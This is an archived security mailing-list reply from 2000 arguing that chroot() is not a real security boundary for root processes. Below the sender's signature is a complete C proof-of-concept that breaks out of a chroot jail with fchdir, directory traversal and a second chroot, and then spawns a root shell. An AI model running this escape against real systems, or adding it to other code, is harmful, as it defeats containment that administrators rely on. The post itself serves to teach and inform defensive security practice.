Mailinglist Archive: opensuse-security (260 mails)

< Previous Next >
Re: [suse-security] dhcpd patch
  • From: Roman Drahtmueller <draht@xxxxxxx>
  • Date: Tue, 25 Jul 2000 12:25:15 +0200 (MEST)
  • Message-id: <Pine.LNX.4.21.0007251152030.11899-100000@xxxxxxxxxxxx>
> hm, the guy, who wrotes that patch seems not very familiar with chroot()ed
> environments. he misses the chdir() after the chroot(), which makes the
> chroot jail unsecure. to be on the safe track initgroups() should be

Just a brief note, since people often tend to consider chroot() a security
feature of the kernel:

As long as a process inside a chroot()ed environment is capable of doing
chroot(2), the process will be able to break out. Executing chdir(2) after
chroot(2) doesn't really remedy this illness.

Try this: chroot(1) as root and then execute the little q+d hack
underneath my sig to break out. You might want to link it statically if
you don't have the necessary libraries around.

Note: chroot(1) does chdir("/") right after chroot(2).

> called in addition to setgid(), he also missed that. there could be more
> failures like this. if i have the time, i'll debug and test this patch...
> maybe it'll become part of our next SuSE, but I don't think so. As long as
> we have Marc's Compartment it would be wiser to use this instead of a
> buggy patch.
>
> Bye,
> Thomas


Thanks,
Roman Drahtmüller.
--
- -
| Roman Drahtmüller <draht@xxxxxxx> "Caution: Cape does not |
SuSE GmbH - Security enable user to fly."
| Nürnberg, Germany (Batman Costume warning label) |
- -


#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define CDIR "testdir"

int main() {

int a;

mkdir(CDIR, 0x666);
a=open(".",O_RDONLY);
fchdir(a);
chroot(CDIR);
chdir(".");
fchdir(a);
chdir("../../../../..");
chroot(".");
chdir(".");
system("/bin/sh");
exit(0);
}



< Previous Next >
Follow Ups
References